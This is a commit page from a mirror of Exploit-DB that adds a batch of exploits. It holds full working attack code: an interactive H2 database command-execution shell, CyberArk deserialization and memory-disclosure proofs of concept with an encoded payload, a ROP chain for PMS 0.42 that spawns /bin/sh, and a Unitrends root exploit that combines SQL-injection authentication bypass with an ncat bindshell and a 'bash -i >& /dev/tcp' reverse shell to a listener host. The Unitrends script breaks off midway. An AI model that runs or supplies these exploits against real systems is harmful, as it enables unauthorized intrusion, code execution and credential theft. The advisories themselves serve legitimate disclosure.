bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-04-10

Browse source 
19 changes to exploits/shellcodes

WebKit - WebAssembly Parsing Does not Correctly Check Section Order
CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure
H2 Database - 'Alias' Arbitrary Code Execution
GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)
PMS 0.42 - Local Stack-Based Overflow (ROP)

Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution
WolfCMS 0.8.3.1 - Cross Site Request Forgery
Cobub Razor 0.7.2 - Add New Superuser Account
MyBB Plugin Recent Threads On Index - Cross-Site Scripting
WolfCMS 0.8.3.1 - Open Redirection
Yahei PHP Prober 0.4.7 - Cross-Site Scripting
WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution
CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution
KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection
KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit
Buddypress Xprofile Custom Fields Type 2.6.3  - Remote Code Execution
WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution
iScripts SonicBB 1.0 - Reflected Cross-Site Scripting
WordPress Plugin Google Drive 2.2 - Remote Code Execution
This commit is contained in:
Offensive Security 2018-04-10 05:01:53 +00:00
parent 4088e4151b
commit c91cad5a90
20 changed files with 1557 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

92
exploits/java/local/44422.py Executable file
View file

@ -0,0 +1,92 @@
'''
Exploit Title: H2 Database Alias Abuse
Date: 05/04/2018
Exploit Author: gambler
Vendor Homepage:www.h2database.com
Software Link: http://www.h2database.com/html/download.html
Version: all versions
Tested on: Linux, Mac OS
'''
import sys
import argparse
import html
import requests
# Blogpost about it
# https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
def getCookie(host):
url = 'http://{}'.format(host)
r = requests.get(url)
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp','.do')
return '{}/{}'.format(url,path)
def login(url,user,passwd,database):
data = {'language':'en','setting':'Generic+H2+(Embedded)','name':'Generic+H2+(Embedded)','driver':'org.h2.Driver','url':database,'user':user,'password':passwd}
r = requests.post(url,data=data)
if '<th class="login">Login</th>' in r.text:
return False
return True
def prepare(url):
cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$;'''
url = url.replace('login','query')
r = requests.post(url,data={'sql':cmd})
if not 'Syntax error' in r.text:
return url
return False
def execve(url,cmd):
r = requests.post(url,data={'sql':"CALL EXECVE('{}')".format(cmd)})
try:
print(html.unescape(r.text.split('</th></tr><tr><td>')[1].split('</td>')[0].replace('<br />','\n').replace('&nbsp;',' ')).encode('utf-8').decode('utf-8','ignore'))
except Exception as e:
print('Something goes wrong')
print(e)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
required = parser.add_argument_group('required arguments')
required.add_argument("-H",
"--host",
metavar='127.0.0.1:4336',
help="Specify a host",
required=True)
required.add_argument("-d",
"--database-url",
metavar='jdbc:h2~/test',
default="jdbc:h2~/test",
help="Database URL",
required=False)
required.add_argument("-u",
"--user",
metavar='username',
default="sa",
help="Username to log on H2 Database, default sa",
required=False)
required.add_argument("-p",
"--password",
metavar='password',
default="",
help="Password to log on H2 Database, default None",
required=False)
args = parser.parse_args()
url = getCookie(args.host)
if login(url,args.user,args.password,args.database_url):
url = prepare(url)
if url:
while 1:
try:
cmd = input('cmdline@ ')
execve(url,cmd)
except KeyboardInterrupt:
print("\nProfessores ensinam, nadadores Nadam e Hackers Hackeiam")
sys.exit(0)
else:
print('ERROR - Inserting Payload')
print("Something goes wrong, exiting...")
else:
print("ERROR - Auth")
print("Something goes wrong, exiting...")

220
exploits/json/webapps/44429.txt Normal file
View file

@ -0,0 +1,220 @@
Advisory: CyberArk Password Vault Web Access Remote Code Execution
The CyberArk Password Vault Web Access application uses authentication
tokens which consist of serialized .NET objects. By crafting manipulated
tokens, attackers are able to gain unauthenticated remote code execution
on the web server.
Details
=======
Product: CyberArk Password Vault Web Access
Affected Versions: < 9.9.5, < 9.10, 10.1
Fixed Versions: 9.9.5, 9.10, 10.2
Vulnerability Type: Remote Code Execution
Security Risk: high
Vendor URL: https://www.cyberark.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-014
Advisory Status: published
CVE: CVE-2018-9843
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9843
Introduction
============
"CyberArk Enterprise Password Vault is designed to secure, rotate and
control access to privileged account credentials based on organizational
policies. A flexible architecture allows organizations to start small
and scale to the largest, most complex IT environments. The solution
protects privileged account credentials used to access the vast majority
of systems."
(from the Enterprise Password Vault Data Sheet [1])
More Details
============
The CyberArk Password Vault provides secure storage for credentials. It
may be accessed through various clients which are also provided by
CyberArk. One such client is the CyberArk Password Vault Web Access, a
.NET web application. After logging into the web application with their
credentials, users may access credentials kept in the vault.
Additionally, CyberArk Password Vault Web Access provides a REST API for
programmatic access to the vault. This API is available at an URL
similar to the following:
https://10.0.0.6/PasswordVault/WebServices/
The API provides multiple endpoints with different methods.
Most methods provided by the API require prior authentication.
Consequently, a user's API call must include an authentication token in
an HTTP authorization header. Tokens may be generated by calling a
dedicated "Logon" API method.
Analysis of this token by RedTeam Pentesting revealed, that it consists
of a base64 encoded, serialized .NET object of the type
"CyberArk.Services.Web.SessionIdentifiers". This class consists of four
string attributes which hold information about a user's session. The
integrity of the serialized data is not protected. Therefore, attackers
may send arbitrary .NET objects to the API in the authorization header.
By leveraging certain gadgets, such as the ones provided by
ysoserial.net [2], attackers may execute arbitrary code in the context
of the web application.
Proof of Concept
================
First, a malicious serialized .NET object is created. Here the
"TypeConfuseDelegate" gadget of ysoserial.net is used to execute the
"ping" command:
------------------------------------------------------------------------
$ ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 \
-c "ping 10.0.0.19" > execute-ping.txt
$ cat execute-ping.txt
AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVy
ZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3Rl
bS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2Nv
cmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu
PWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwAD
AAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtb
U3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0
cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIA
AAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29t
cGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs
dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19j
b21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAA
AAIAAAAGBgAAABEvYyBwaW5nIDEwLjAuMC4xOQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxl
Z2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMD
AzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lz
dGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJl
ZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAE
CAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkH
AAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBl
TmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl
cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tT
eXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRy
YWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBt
c2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRv
a2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lz
dGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49
Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs
dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5
c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu
PWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAA
BVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXph
dGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpT
aWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5U
eXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBT
dGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9z
dGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoB
CgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50
MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5J
bnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgA
AAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwg
VmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1
YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL
------------------------------------------------------------------------
Next, an API call is invoked which includes the malicious .NET object in
its authorization header. This is done with cURL [3] as follows:
------------------------------------------------------------------------
$ curl -s -X GET -k \
--url 'https://10.0.0.6/PasswordVault/WebServices/PIMServices.svc/'\
'Applications/?Location=\&IncludeSublocations=true' \
--header "authorization: $(cat execute-ping.txt)" \
--header 'content-type: application/json'
------------------------------------------------------------------------
Simultaneously, tcpdump [4] is invoked on the host 10.0.0.19 to listen
for ICMP packets originating from the web server:
------------------------------------------------------------------------
$ sudo tcpdump -i enp0s25 icmp
tcpdump: verbose output suppressed[...]
listening on enp0s25[...]
IP 10.0.0.6 > 10.0.0.19: ICMP echo request, id 1, seq 6, length 40
IP 10.0.0.19 > 10.0.0.6: ICMP echo reply, id 1, seq 6, length 40
------------------------------------------------------------------------
The fact that ICMP packets are received from the web server, indicates
that attacker-controlled code was executed.
Workaround
==========
Disable any access to the API at the route /PasswordVault/WebServices.
Fix
===
Upgrade CyberArk Password Vault Web Access to version 9.9.5, 9.10 or
10.2.
Security Risk
=============
The risk of this vulnerability is rated as high. Attackers with access
to the PrivateArk Vault Web Access REST API may execute arbitrary code
on the web server. No credentials are required. Attackers gain access to
the system with the privileges of the web application. Consequently,
such access may be used to backdoor the web application and compromise
further accounts and credentials. Additionally, attackers may pivot from
the web server to attack the vault directly.
Timeline
========
2017-11-24 Vulnerability identified
2018-01-22 Customer approved disclosure to vendor
2018-02-05 Vendor notified
2018-02-28 Vendor released fixed version
2018-04-06 CVE number requested
2018-04-07 CVE number assigned
2018-04-09 Advisory released
References
==========
[1] http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf
[2] https://github.com/pwntester/ysoserial.net
[3] https://curl.haxx.se/
[4] https://www.tcpdump.org/
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

180
exploits/linux/dos/44428.txt Normal file
View file

@ -0,0 +1,180 @@
Advisory: CyberArk Password Vault Memory Disclosure
Data in the CyberArk Password Vault may be accessed through a proprietary
network protocol. While answering to a client's logon request, the vault
discloses around 50 bytes of its memory to the client.
Details
=======
Product: CyberArk Password Vault
Affected Versions: < 9.7, < 10
Fixed Versions: 9.7, 10
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://www.cyberark.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-015
Advisory Status: published
CVE: CVE-2018-9842
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9842
Introduction
============
"CyberArk Enterprise Password Vault is designed to secure, rotate and
control access to privileged account credentials based on organizational
policies. A flexible architecture allows organizations to start small
and scale to the largest, most complex IT environments. The solution
protects privileged account credentials used to access the vast majority
of systems."
(from the Enterprise Password Vault Data Sheet [1])
More Details
============
The CyberArk Password Vault serves as a database to securely store
credentials. Furthermore, the vault enforces access controls and logs
access to its records. Data stored in the vault may be accessed through
a proprietary network protocol which is usually transmitted over TCP
port 1858. Various clients, such as web applications or command line
tools, are provided by CyberArk to interface with a vault.
The first message a client sends to the vault is a "Logon" command.
Using a network sniffer, such a message was captured:
$ xxd logon.bin
00000000: ffff ffff f700 0000 ffff ffff 3d01 0000 ............=...
00000010: 5061 636c 6953 6372 6970 7455 7365 7200 PacliScriptUser.
00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000030: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000060: 0000 0000 0000 0000 0000 0000 0020 2020 .............
00000070: 20ff ffff ff00 0000 0000 0000 0000 0073 ..............s
00000080: 0000 00ce cece ce00 0000 0000 0000 0000 ................
00000090: 0000 0000 0000 0030 3d4c 6f67 6f6e fd31 .......0=Logon.1
000000a0: 3135 3d37 2e32 302e 3930 2e32 38fd 3639 15=7.20.90.28.69
000000b0: 3d50 fd31 3136 3d30 fd31 3030 3dfd 3231 =P.116=0.100=.21
000000c0: 373d 59fd 3231 383d 5041 434c 49fd 3231 7=Y.218=PACLI.21
000000d0: 393d fd33 3137 3d30 fd33 3537 3d30 fd32 9=.317=0.357=0.2
000000e0: 323d 5061 636c 6953 6372 6970 7455 7365 2=PacliScriptUse
000000f0: 72fd 3336 373d 3330 fd00 00 r.367=30...
Starting at offset 0x97, a type of remote procedure call can be
identified. In this case, "Logon" is invoked for the user
"PacliScriptUser". This message does not contain any random,
unpredictable data. Therefore, it may be replayed at will once captured.
This can be accomplished using netcat:
------------------------------------------------------------------------
$ cat logon.bin | nc -v 10.0.0.5 1858
------------------------------------------------------------------------
RedTeam Pentesting discovered that the message sent by the vault in
response to a "Logon" command contains about 50 bytes of the vault's
memory.
Proof of Concept
================
To trigger the vulnerability, a previously captured logon message is
sent to the vault using netcat:
------------------------------------------------------------------------
$ cat logon.bin | nc -v 10.0.0.5 1858 | xxd
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.5:1858.
Ncat: 251 bytes sent, 273 bytes received in 0.01 seconds.
00000000: e500 0000 0000 0000 3001 0000 5061 636c ........0...Pacl
00000010: 6953 6372 6970 7455 7365 7200 0000 0000 iScriptUser.....
00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000030: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000060: 0000 0000 0000 0000 0000 0000 001e 0200 ................
00000070: 0078 9c53 6362 0003 7616 0686 ff40 e019 .x.Scb..v....@..
00000080: e2e8 ec6b 6069 eaaa 1052 9498 579c 985c ...k`i...R..W..\
00000090: 9299 9fa7 e093 9f0e 248b b333 0b0a 5253 ........$..3..RS
000000a0: 14d2 f28b 144a 8b53 8b14 0212 9373 3283 .....J.S.....s2.
000000b0: 938b 320b 4a42 817c 3d85 a0d4 c4e2 fc3c ..2.JB.|=......<
000000c0: 2b05 a070 6a5e 8942 717e 7276 6a89 4266 +..pj^.Bq~rvj.Bf
000000d0: 3150 20bf 3835 458f 8b61 140c 15c0 08c4 1P .85E..a......
000000e0: 0063 0e25 c06d 6265 7220 3d20 7661 756c .c.%.mber = vaul
000000f0: 745f 6669 6c65 5f63 6174 6567 6f72 6965 t_file_categorie
00000100: 735f 7265 636f 7264 7300 2968 b8fb aae9 s_records.)h....
00000110: 62
------------------------------------------------------------------------
Starting at offset 0xe0, the vault discloses a total of 49 bytes of its
memory to the client.
Workaround
==========
None
Fix
===
Upgrade CyberArk Password Vault to version 9.7 or 10.
Security Risk
=============
This vulnerability is rated as a high risk. Exploitation only requires
network access to a PrivateArk Password Vault. Although each request
only discloses about 50 bytes of memory, sustained exploitation will
likely reveal sensitive information at some point in time. This
critically undermines the primary purpose of the PrivateArk Password
Vault.
Timeline
========
2017-11-24 Vulnerability identified
2018-01-22 Customer approved disclosure to vendor
2018-02-05 Vendor notified
2018-04-06 CVE number requested
2018-04-07 CVE number assigned
2018-04-09 Advisory released
References
==========
[1] http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

123
exploits/linux/local/44426.py Executable file
View file

@ -0,0 +1,123 @@
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
#
# Description: PMS 0.42 is prone to a local unauthenticated stack-based overflow
# The vulnerability is due to an unproper filter of user supplied input while reading
# the configuration file and parsing the malicious crafted values.
#
# 0004| 0xbfffe6c4 --> 0x445b91 (": could not open file.\n")
# 0008| 0xbfffe6c8 --> 0xbfffe720 ("Didn't find configuration file ", 'A' <repeats 169 times>...)
# 0012| 0xbfffe6cc --> 0xbfffe6f8 --> 0x736e6f00 ('')
#
# Program: PMS 0.42 Practical Music Search, an MPD client
# PMS is an ncurses based client for Music Player Daemon.
# Vendor homepage: https://pms.sourceforge.net
# Kali Filename: pool/main/p/pms/pms_0.42-1+b2_i386.deb
#
# CANARY : disabled
# FORTIFY : disabled
# NX : ENABLED
# PIE : disabled
# RELRO : Partial
#
#0000| 0xbfffe6c0 --> 0x4592a0 --> 0x45f870 --> 0x4
#0004| 0xbfffe6c4 --> 0x445b91 (": could not open file.\n")
#0008| 0xbfffe6c8 --> 0xbfffe720 ("Didn't find configuration file ", 'A' <repeats 169 times>...)
#0012| 0xbfffe6cc --> 0xbfffe6f8 --> 0x736e6f00 ('')
#0016| 0xbfffe6d0 --> 0x4637ef ("german")
#0020| 0xbfffe6d4 --> 0x4637f6 ("de_DE.ISO-8859-1")
#0024| 0xbfffe6d8 --> 0x46adb0 ("AAAA\240\312F")
#0028| 0xbfffe6dc ("2018-04-04 06:57:58")
#Legend: code, data, rodata, value
#Stopped reason: SIGSEGV
#0x0042f6c6 in Pms::log (this=<optimized out>, verbosity=<optimized out>, code=0x41414141, format=<optimized out>) at src/pms.cpp:982
#982 if (!disp && verbosity < MSG_DEBUG)
#gdb-peda$ backtrace
#0 0x0042f6c6 in Pms::log (this=<optimized out>, verbosity=<optimized out>, code=0x41414141, format=<optimized out>) at src/pms.cpp:982
#1 0x41414141 in ?? ()
import os, subprocess
from struct import pack
# rop execve ( bin/sh )
rop = "A"*1017 # junk
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi
; pop ebp ; ret
rop += pack('<I', 0x0811abe0) # @ .data
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0807b744) # pop eax ; ret
rop += '/bin'
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;
pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; popedi ;
pop ebp ; ret
rop += pack('<I', 0x0811abe4) # @ .data + 4
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0807b744) # pop eax ; ret
rop += '//sh'
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;
pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi
; pop ebp ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;
pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
rop += pack('<I', 0x0811abe0) # @ .data
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x08067b43) # pop ecx ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi
; pop ebp ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x0811abe0) # padding without overwrite ebx
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080c861f) # int 0x80
try:
print("[*] PMS 0.42 Buffer Overflow by Juan Sacco")
print("[*] Please wait.. running")
subprocess.call(["pms -c", rop])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "PMS not found!"
else:
print "Error executing exploit"
raise

258
exploits/linux/remote/44297.py Executable file
View file

@ -0,0 +1,258 @@
# Exploit Title: Unauthenticated root RCE for Unitrends UEB 10.0
# Date: 10/17/2017
# Exploit Authors: Cale Smith, Benny Husted, Jared Arave
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
# Vendor Homepage: https://www.unitrends.com/
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
# Version: 10.0.0
# Tested on: 10.0.0-2.201706252204.CentOS6, 10.0.0-5.201708151911.CentOS6
# CVE: CVE-2018-6328, CVE-2018-6329
import httplib
import urllib
import ssl
import random
import sys
import base64
import string
import socket
from optparse import OptionParser
# Print some helpful words:
print """
###############################################################################
Unauthenticated root RCE for Unitrends Backup
Tested against appliance versions:
[+] 10.0.0-2.201706252204.CentOS6
[+] 10.0.0-5.201708151911.CentOS6
The Deal:
1. A sqli + low priv remote RCE vulnerability to is used to establish a low priv
remote shell from the UEB 10 host (you don't need to worry about setting up
a listener).
2. A local privesc exploit containing the desired command is uploaded to the host
using this shell, and executed.
3. The initial low priv shell is closed, and the local privesc script is deleted.
To use the exploit as written, make sure you're running a reverse
shell listener somewhere, using a command like:
$ nc -nlvp 4444
Then, just specify the ip and port of the remote listener in the
exploit command. Alternatively, modify this exploit to contain a
command of your choosing by modifying the 'cmd' argument.
###############################################################################
"""
# Disable SSL Cert validation
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
# Parse command line args:
usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
" %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'"
parser = OptionParser(usage=usage)
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
help="Target host w/ UNITRENDS UEB installation")
parser.add_option("-l", '--LHOST', dest='lhost', action="store",
help="Host listening for reverse shell connection")
parser.add_option("-p", '--LPORT', dest='lport', action="store",
help="Port on which nc is listening")
parser.add_option("-c", '--cmd', dest='cmd', action="store",
help="Run a custom command, no reverse shell for you.")
(options, args) = parser.parse_args()
if options.cmd:
if (options.lhost or options.lport):
parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mututally exclusive.\n")
elif not options.rhost:
parser.error("[!] No remote host specified.\n")
elif options.rhost is None or options.lhost is None or options.lport is None:
parser.print_help()
sys.exit(1)
RHOST = options.rhost
LHOST = options.lhost
LPORT = options.lport
if options.cmd:
cmd = options.cmd
else:
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
apache_ncat_port = random.randint(4000,5000)
###############################################################################
# STAGE 1: LOW PRIVE RCE!
# Bypass authentication and run a command as apache. In this case,
# we'll run a netcat bindshell on a random port...
# ncat -lvp 4444 -e /bin/sh
# NB: This is not the part of the process where we're going to run our command.
# We're establishing a reverse shell which will be used later to state a
# privilege escalation payload onto this box.
###############################################################################
low_priv_cmd = "ncat -lvp {0} -e /bin/sh &".format(str(apache_ncat_port))
url = '/api/hosts/'
# Here, a SQLi string overrides the uuid, providing auth bypass.
# We'll need to base64 encode before sending...
auth = base64.b64encode("v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0")
